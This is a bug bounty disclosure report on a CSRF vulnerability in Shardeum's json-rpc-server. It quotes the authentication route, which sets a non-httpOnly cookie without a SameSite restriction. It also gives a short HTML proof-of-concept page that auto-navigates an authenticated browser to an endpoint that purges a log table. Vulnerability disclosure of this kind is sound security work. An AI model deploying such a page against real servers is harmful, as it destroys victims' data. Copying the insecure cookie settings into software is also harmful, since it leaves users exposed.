# Boost \_ Shardeum\_ Ancillaries 34367 - \[Websites and Applications - Low] CSRF vulnerability due to mi

Submitted on Sat Aug 10 2024 12:56:34 GMT-0400 (Atlantic Standard Time) by @hulkvision for [Boost | Shardeum: Ancillaries](https://immunefi.com/bounty/shardeum-ancillaries-boost/)

Report ID: #34367

Report type: Websites and Applications

Report severity: Low

Target: <https://github.com/shardeum/json-rpc-server/tree/dev>

Impacts:

* CSRF vulnerability allowing blackhat to perform authenticated actions
* Changing sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction, such as: Email, Password of the victim etc.

## Description

## Brief/Intro

The access-token was missing `SameSite=Strict` attribute which leads to CSRF vulnerability resulting in allowing BlackHat to perform authenticated actions.

## Vulnerability Details

In `src/routes/authenticate.ts`

```
router.route('/:passphrase').get(async function (req: Request, res: Response) {
  const { passphrase } = req.params
  const payload = { user: 'shardeum-dev' }
  if (passphrase === CONFIG.passphrase) {
    // token don't expire, usually this is bad practice
    // for the case being implementing refresh token is overkill
    // stolen token worst case scenario our debug data ended up being not useful.
    const token = jwt.sign(payload, CONFIG.secret_key)
    res.cookie('access_token', token, {
      httpOnly: false,
      maxAge: 1000 * 60 * 60 * 700, // ~ a month
    })
    return res.send({ token: token, message: 'authenticated and authorized for debug api calls' }).status(200)
  }
  return res.send({ message: 'wrong passphrase' }).status(400)
})
```

After authenticating the rpc server does not define `SameSite=Strict` cookie restriction, which results in allowing malicious websites to call authenticated `GET` API which perform actions like purging tables,modifying config values, node subscription etc.

## Impact Details

* The vulnerability allows malicious websites performing actions like purging tables,modifying config values, node subscription etc.
* The vulnerability could result in deletion of debug data.

## References

<https://github.com/shardeum/json-rpc-server/blob/d799a64c1ab4a7cffdf472a8be689fe7afb993e9/src/routes/authenticate.ts#L15-L18>

## Proof of concept

## Proof of Concept

```
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>csrf performing authenticated action</title>
</head>
<body>
	<h1> calling /log/cleanTxTable which will trigger purging of table that store transaction logging </h1>
	<a href="http://127.0.0.1:8888/log/cleanTxTable"> click here to attack </a>
</body>

<script type="text/javascript">
	function callAutomatically() {
        document.location = 'http://127.0.0.1:8888/log/cleanTxTable';
    }

    setTimeout(callAutomatically,3000);

</script>
</html>
```

## Steps to Reproduce

1. Authenticate to RPC server with password
2. Save the poc file as `csrfpoc.html`
3. Open `csrfpoc.html` from the browser you have authenticated with RPC server.
4. Either click on `Click here to attack` or wait 3 second for attack to happen automatically
5. You will see a response `{"success":true}`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://reports.immunefi.com/shardeum-ancillaries/boost-_-shardeum_-ancillaries-34367-websites-and-applications-low-csrf-vulnerability-due-to-missing.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.